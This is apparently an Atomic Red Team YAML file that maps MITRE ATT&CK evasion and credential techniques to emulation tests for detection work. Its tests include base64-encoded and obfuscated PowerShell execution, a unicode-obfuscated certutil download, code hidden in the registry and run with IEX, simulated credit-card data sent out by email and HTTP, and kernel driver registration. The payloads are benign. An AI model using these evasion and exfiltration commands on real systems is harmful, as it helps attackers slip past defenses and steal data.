description: Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved
October 12, 2021.
url: https://flylib.com/books/en/4.395.1.192/1/
- source_name: ELC Extended Attributes
description: 'Howard Oakley. (2020, October 24). There''s more to files than
data: Extended Attributes. Retrieved October 12, 2021.'
url: https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/
- source_name: sentinellabs resource named fork 2020
description: Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides
in Named Fork. Retrieved October 12, 2021.
url: https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/
- source_name: macOS Hierarchical File System Overview
description: Tenon. (n.d.). Retrieved October 12, 2021.
url: http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:14.736Z'
name: Resource Forking
description: |-
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jaron Bradley @jbradley89
- Ivan Sinyakov
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1027:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a
created: '2017-05-31T21:30:32.662Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027
external_id: T1027
- source_name: Volexity PowerDuke November 2016
description: 'Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election
Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January
11, 2017.'
url: https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/
- source_name: GitHub Revoke-Obfuscation
description: Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February
12, 2018.
url: https://github.com/danielbohannon/Revoke-Obfuscation
- source_name: FireEye Obfuscation June 2017
description: 'Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild:
Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February
12, 2018.'
url: https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
- source_name: FireEye Revoke-Obfuscation July 2017
description: 'Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation:
PowerShell Obfuscation Detection Using Science. Retrieved November 17, 2024.'
url: https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf
- source_name: GitHub Office-Crackros Aug 2016
description: Carr, N. (2016, August 14). OfficeCrackros. Retrieved February
12, 2018.
url: https://github.com/itsreallynick/office-crackros
- source_name: Linux/Cdorked.A We Live Security Analysis
description: 'Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache
backdoor being used in the wild to serve Blackhole. Retrieved September
10, 2017.'
url: https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/
- source_name: Carbon Black Obfuscation Sept 2016
description: Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved
February 12, 2018.
url: https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/
- source_name: PaloAlto EncodedCommand March 2017
description: White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand
PowerShell Attacks. Retrieved February 12, 2018.
url: https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:15.265Z'
name: Obfuscated Files or Information
description: "Adversaries may attempt to make an executable or file difficult
to discover or analyze by encrypting, encoding, or otherwise obfuscating its
contents on the system or in transit. This is common behavior that can be
used across different platforms and the network to evade defenses. \n\nPayloads
may be compressed, archived, or encrypted in order to avoid detection. These
payloads may be used during Initial Access or later to mitigate detection.
Sometimes a user's action may be required to open and [Deobfuscate/Decode
Files or Information](https://attack.mitre.org/techniques/T1140) for [User
Execution](https://attack.mitre.org/techniques/T1204). The user may also be
required to input a password to open a password protected compressed/encrypted
file that was provided by the adversary. (Citation: Volexity PowerDuke November
2016) Adversaries may also use compressed or archived scripts, such as JavaScript.
\n\nPortions of files can also be encoded to hide the plain-text strings that
would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A
We Live Security Analysis) Payloads may also be split into separate, seemingly
benign files that only reveal malicious functionality when reassembled. (Citation:
Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command
Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands
executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
Environment variables, aliases, characters, and other platform/language specific
semantics can be used to evade signature based detections and application
control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye
Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Red Canary
- Christiaan Beek, @ChristiaanBeek
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Network Devices
- Windows
x_mitre_version: '1.7'
identifier: T1027
atomic_tests:
- name: Decode base64 Data into Script
auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb
description: "Creates a base64-encoded data file and decodes it into an executable
shell script\n\nUpon successful execution, sh will execute art.sh, which is
a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand
uname -v\n"
supported_platforms:
- macos
- linux
input_arguments:
shell_command:
description: command to encode
type: string
default: echo Hello from the Atomic Red Team && uname -v
dependency_executor_name: sh
dependencies:
- description: 'encode the command into base64 file
'
prereq_command: 'if [ -e "/tmp/encoded.dat" ]; then exit 0; else exit 1; fi
'
get_prereq_command: |
if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64encode -r -"; else cmd="base64"; fi;
echo "#{shell_command}" | $cmd > /tmp/encoded.dat
executor:
command: |
if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n"
name: sh
- name: Execute base64-encoded PowerShell
auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6
description: |
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
supported_platforms:
- windows
input_arguments:
powershell_command:
description: PowerShell command to encode
type: string
default: Write-Host "Hey, Atomic!"
executor:
command: |
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
name: powershell
- name: Execute base64-encoded PowerShell from Windows Registry
auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec
description: |
Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute encoded command and read/write from the registry.
supported_platforms:
- windows
input_arguments:
registry_key_storage:
description: Windows Registry Key to store code
type: string
default: HKCU:Software\Microsoft\Windows\CurrentVersion
powershell_command:
description: PowerShell command to encode
type: string
default: Write-Host "Hey, Atomic!"
registry_entry_storage:
description: Windows Registry entry to store code under key
type: string
default: Debug
executor:
command: |
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage}
-Name #{registry_entry_storage}
'
name: powershell
- name: Execution from Compressed File
auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f
description: 'Mimic execution of compressed executable. When successfully executed,
calculator.exe will open.
'
supported_platforms:
- windows
input_arguments:
url_path:
description: url to download Exe
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip
dependency_executor_name: powershell
dependencies:
- description: 'T1027.exe must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe")
{exit 0} else {exit 1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\" -Force
executor:
command: '"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"
'
cleanup_command: |
taskkill /f /im calculator.exe >nul 2>nul
taskkill /f /im CalculatorApp.exe >nul 2>nul
name: command_prompt
- name: DLP Evasion via Sensitive Data in VBA Macro over email
auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
description: |
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path of the XLSM file
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
sender:
description: sender email
type: string
default: test@corp.com
receiver:
description: receiver email
type: string
default: test@corp.com
smtp_server:
description: SMTP Server IP Address
type: string
default: 127.0.0.1
executor:
command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
-Attachments "#{input_file}" -SmtpServer #{smtp_server}
'
name: powershell
- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
description: |
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path of the XLSM file
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
ip_address:
description: Destination IP address
type: string
default: 127.0.0.1
executor:
command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"
'
name: powershell
- name: Obfuscated Command in PowerShell
auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
description: 'This is an obfuscated PowerShell command which when executed prints
"Hello, from PowerShell!". Example is from the 2021 Threat Detection Report
by Red Canary.
'
supported_platforms:
- windows
executor:
command: '$cmDwhy =[TyPe]("{0}{1}" -f ''S'',''TrING'') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f''nv'',''cO'',''ert'') ; &("{0}{2}{3}{1}{4}"
-f''In'',''SiO'',''vOKe-EXp'',''ReS'',''n'') ( (&("{1}{2}{0}"-f''blE'',''gET-'',''vaRIA'') (''CMdw''+''h''+''y''))."v`ALUe"::("{1}{0}"
-f''iN'',''jO'').Invoke('''',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163
, 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40,
120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { (
[CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
'
name: powershell
- name: Obfuscated Command Line using special Unicode characters
auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f
description: |
This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters).
Reference:
https://wietze.github.io/blog/windows-command-line-obfuscation
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path/filename to save the downloaded file to
type: path
default: Atomic-license.txt
executor:
steps: |
1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.
certutil —ૹu૰rlࢰcac෯he –split −"൏ᶠ൸" #{remote_file} #{local_path}
2. Press enter to execute the command. You will find the file or webpage you specified saved to the file you specified in the command.
name: manual
- name: Snake Malware Encrypted crmlog file
auto_generated_guid: 7e47ee60-9dd1-4269-9c4f-97953b183268
description: "The following Atomic Test will create a file with a specific name
and sets its attributes to Hidden, System, and Archive. This was related to
the Snake Malware campaign and is later decrypted by Snake's kernel driver.\n[Snake
Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
\ \n"
supported_platforms:
- windows
executor:
command: '$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog;
$file.Attributes = ''Hidden'', ''System'', ''Archive''; Write-Host "File
created: $($file.FullName)"
'
cleanup_command: '$fileNameToDelete = ''04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog'';
$filePathToDelete = "$env:windir\registration\"; $fullPathToDelete = Join-Path
$filePathToDelete $fileNameToDelete; if (Test-Path $fullPathToDelete) {
Remove-Item -Path $fullPathToDelete -Force; Write-Host "File deleted: $fullPathToDelete"
} else { Write-Host "File not found: $fullPathToDelete" }
'
name: powershell
elevation_required: true
- name: Execution from Compressed JScript File
auto_generated_guid: fad04df1-5229-4185-b016-fb6010cd87ac
description: 'Mimic execution of compressed JavaScript file. When successfully
executed, calculator.exe will open. This test is meant to help emulate Gootloader
as per https://redcanary.com/blog/gootloader/
'
supported_platforms:
- windows
input_arguments:
url_path:
description: url to download JScript file
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/t1027js.zip
dependency_executor_name: powershell
dependencies:
- description: 'T1027.js must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js")
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force
executor:
command: '"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"
'
cleanup_command: 'taskkill /f /im calculator.exe >nul 2>nul
'
name: command_prompt
T1556.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc
created: '2022-05-31T19:31:38.431Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/006
external_id: T1556.006
- source_name: Russians Exploit Default MFA Protocol - CISA March 2022
description: Cyber Security Infrastructure Agency. (2022, March 15). Russian
State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor
Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved May
31, 2022.
url: https://www.cisa.gov/uscert/ncas/alerts/aa22-074a
- source_name: Mandiant APT42
description: 'Mandiant. (n.d.). APT42: Crooked Charms, Cons and Compromise.
Retrieved September 16, 2022.'
url: https://www.mandiant.com/media/17826
- source_name: Azure AD Conditional Access Exclusions
description: Microsoft. (2022, August 26). Use Azure AD access reviews to
manage users excluded from Conditional Access policies. Retrieved August
30, 2022.
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:59.338Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
adversaries have gained access to a network by either compromising an account
lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication
Request Generation](https://attack.mitre.org/techniques/T1621), adversaries
may leverage their access to modify or completely disable MFA defenses. This
can be accomplished by abusing legitimate features, such as excluding users
from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled
MFA method, or by manually patching MFA programs and configuration files to
bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD
Conditional Access Exclusions)\n\nFor example, modifying the Windows hosts
file (`C:\\windows\\system32\\drivers\\etc\\hosts`) to redirect MFA calls
to localhost instead of an MFA server may cause the MFA process to fail. If
a \"fail open\" policy is in place, any otherwise successful authentication
attempt may be granted access without enforcing MFA. (Citation: Russians Exploit
Default MFA Protocol - CISA March 2022) \n\nDepending on the scope, goals,
and privileges of the adversary, MFA defenses may be disabled for individual
accounts or for all accounts tied to a larger group, such as all domain accounts
in a victim's network environment.(Citation: Russians Exploit Default MFA
Protocol - CISA March 2022) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
- Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- Office Suite
- Identity Provider
x_mitre_version: '1.4'
atomic_tests: []
T1036.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52
created: '2020-02-10T19:49:46.752Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/001
external_id: T1036.001
- source_name: Threatexpress MetaTwin 2017
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:15.520Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
x_mitre_version: '1.0'
atomic_tests: []
T1564.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d
created: '2020-06-29T15:36:41.535Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/006
external_id: T1564.006
- source_name: ESET MirrorFace 2025
description: " Dominik Breitenbacher. (2025, March 18). Operation AkaiRyū:
MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor. Retrieved
May 22, 2025."
url: https://www.welivesecurity.com/en/eset-research/operation-akairyu-mirrorface-invites-europe-expo-2025-revives-anel-backdoor/
- source_name: vNinja Rogue VMs 2024
description: Christian Mohn. (2024, November 11). Beware Of The Rogue VMs!.
Retrieved March 26, 2025.
url: https://vninja.net/2024/11/11/beware-of-the-rogue-vms/
- source_name: SingHealth Breach Jan 2019
description: Committee of Inquiry into the Cyber Attack on SingHealth. (2019,
January 10). Public Report of the Committee of Inquiry into the Cyber Attack
on Singapore Health Services Private Limited's Patient Database. Retrieved
June 29, 2020.
url: https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx
- source_name: CyberCX Akira Ransomware
description: CyberCX. (2023, September 15). Weaponising VMs to bypass EDR
– Akira ransomware. Retrieved April 4, 2025.
url: https://cybercx.com.au/blog/akira-ransomware/
- source_name: Securonix CronTrap 2024
description: 'Den Iuzvyk and Tim Peck. (2024, November 4). CRON#TRAP: Emulated
Linux Environments as the Latest Tactic in Malware Staging. Retrieved May
22, 2025.'
url: https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/
- source_name: Shadowbunny VM Defense Evasion
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
url: https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/
- source_name: MITRE VMware Abuse 2024
description: 'Lex Crumpton. (2024, May 22). Infiltrating Defenses: Abusing
VMware in MITRE’s Cyber Intrusion. Retrieved March 26, 2025.'
url: https://medium.com/mitre-engenuity/infiltrating-defenses-abusing-vmware-in-mitres-cyber-intrusion-4ea647b83f5b
- source_name: Sophos Ragnar May 2020
description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys
virtual machine to dodge security. Retrieved June 29, 2020.
url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:15.607Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance.(Citation: CyberCX Akira Ransomware) Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V), deploy lightweight emulators (ex: QEMU), or drop the necessary files to run a virtual instance (ex: VirtualBox binaries).(Citation: Securonix CronTrap 2024) After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)
Threat actors may also leverage temporary virtualized environments such as the Windows Sandbox, which supports the use of `.wsb` configuration files for defining execution parameters. For example, the `` property supports the creation of a shared folder, while the `` property allows the specification of a payload.(Citation: ESET MirrorFace 2025)
In VMWare environments, adversaries may leverage the vCenter console to create new virtual machines. However, they may also create virtual machines directly on ESXi servers by running a valid `.vmx` file with the `/bin/vmx` utility. Adding this command to `/etc/rc.local.d/local.sh` (i.e., [RC Scripts](https://attack.mitre.org/techniques/T1037/004)) will cause the VM to persistently restart.(Citation: vNinja Rogue VMs 2024) Creating a VM this way prevents it from appearing in the vCenter console or in the output to the `vim-cmd vmsvc/getallvms` command on the ESXi server, thereby hiding it from typical administrative activities.(Citation: MITRE VMware Abuse 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Johann Rehberger
- Janantha Marasinghe
- Menachem Shafran, XM Cyber
- Enis Aksu
- Satoshi Kamekawa, ITOCHU Cyber & Intelligence Inc.
- Yusuke Niwa, ITOCHU Cyber & Intelligence Inc.
- Shuhei Sasada, ITOCHU Cyber & Intelligence Inc.
- Jiraput Thamsongkrah
- Purinut Wongwaiwuttiguldej
- Natthawut Saexu
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- ESXi
x_mitre_version: '1.3'
identifier: T1564.006
atomic_tests:
- name: Register Portable Virtualbox
auto_generated_guid: c59f246a-34f8-4e4d-9276-c295ef9ba0dd
description: "ransomware payloads via virtual machines (VM). \n[Maze ransomware](https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/)\n"
supported_platforms:
- windows
input_arguments:
msi_file_path:
description: Path to the MSI file
type: path
default: PathToAtomicsFolder\T1564.006\bin\Virtualbox_52.msi
cab_file_path:
description: Path to the CAB file
type: path
default: PathToAtomicsFolder\T1564.006\bin\common.cab
dependency_executor_name: powershell
dependencies:
- description: 'MSI file must exist on disk at specified location (#{msi_file_path})
'
prereq_command: 'if (Test-Path "#{msi_file_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{msi_file_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
- description: 'CAB file must exist on disk at specified location (#{cab_file_path})
'
prereq_command: 'if (Test-Path "#{cab_file_path}") {exit 0} else {exit 1}
'
get_prereq_command: "New-Item -Type Directory (split-path \"#{cab_file_path}\")
-ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab\"
-OutFile \"#{cab_file_path}\" \n"
- description: 'Old version of Virtualbox must be installed
'
prereq_command: 'if (Test-Path "C:\Program Files\Oracle\VirtualBox\VboxC.dll")
{exit 0} else {exit 1}
'
get_prereq_command: 'msiexec /i "#{msi_file_path}" /qn
'
executor:
command: |
"C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" /reregserver
regsvr32 /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init"
sc create VBoxDRV binpath= "C:\Program Files\Oracle\VirtualBox\drivers\VboxDrv.sys" type= kernel start= auto error= normal displayname= PortableVBoxDRV
sc start VBoxDRV
cleanup_command: |
sc stop VBoxDRV
sc delete VBoxDRV
regsvr32 /u /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
msiexec /x "#{msi_file_path}" /qn
name: command_prompt
- name: Create and start VirtualBox virtual machine
auto_generated_guid: 88b81702-a1c0-49a9-95b2-2dd53d755767
description: |
Create a simple VirtualBox VM and start up the machine
Cleanup command stops and deletes the newly created VM and associated files
https://www.virtualbox.org/manual/ch08.html#vboxmanage-startvm
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
https://attack.mitre.org/techniques/T1564/006/
supported_platforms:
- windows
input_arguments:
vm_name:
description: Name of the new virtual machine
type: string
default: Atomic VM
virtualbox_exe:
description: Path to the VirtualBox executable
type: path
default: C:\Program Files\Oracle\VirtualBox\VirtualBox.exe
vboxmanage_exe:
description: Path to the executable for VBoxManage, the command-line interface
